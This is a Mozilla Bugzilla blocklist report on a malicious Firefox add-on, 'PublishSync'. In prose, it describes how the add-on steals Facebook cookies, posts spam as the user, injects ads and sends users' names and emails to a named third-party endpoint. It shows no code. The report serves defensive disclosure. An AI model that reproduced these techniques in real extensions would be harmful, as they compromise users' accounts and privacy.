Closed Bug 730059 Opened 13 years ago Closed 13 years ago

Malicious "PublishSync" add-on

Categories

(Toolkit :: Blocklist Policy Requests, defect)

Product:
Toolkit
Component:
Blocklist Policy Requests
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED FIXED

People

(Reporter: mhammell, Assigned: jorgev)

Details

Attachments

(1 file)

publishsync.xpi
324.61 KB, text/plain
Details
Attached file publishsync.xpi
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11 Steps to reproduce: Add-on downloaded from https://imorse.net/publish-sync/download/firefox/publishsync.xpi Actual results: This one is written using Mozilla's JetPack APIs The add-on injects the following JS files: client.facebook.js facebook.js site_facebook.js client.facebook.js: Injects some extra options into our privacy settings page, with specific support for Chinese language/locale facebook.js: Attempts to authorize the FB app_id 279629492072378 with these permissions: publish_stream, offline_access, email, and manage_pages Sends your UID, Name, Email, and Locale to http://imorse.net/publish-sync/facebook/checkaccount Has logic to check if Facebook returns "you just sent the same message" or "you are sending too fast" warnings when it's posting as you without your knowledge. site_facebook.js: Handles stealing your FB cookies Sends spam with a link to this YouTube video http://www.youtube.com/watch?v=-ONp6DQL6bM Injects this ad over our existing Facebook ads: http://www.lativ.com.tw/Detail/03394021 with this image https://imorse.net/publish-sync/content/ads/images/2011-09-03_1717.jpg If your vanity name is 'ValenHsu', it also injects an ad with a link to http://www.facebook.com/FamilyMart?sk=app_167110672433 and an iframe to load a like button for http://www.fever38.com/promotion?promoid=21033 Expected results: It should not send you personal information to a third-party server without your consent. It should not steal cookies and install a Facebook application to enable posting as you without your consent.
Id: psid-vhvxQHMZBOzUZA@jetpack
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
https://addons.mozilla.org/en-US/firefox/blocked/i70
Status: ASSIGNED → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
Product: addons.mozilla.org → Toolkit
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: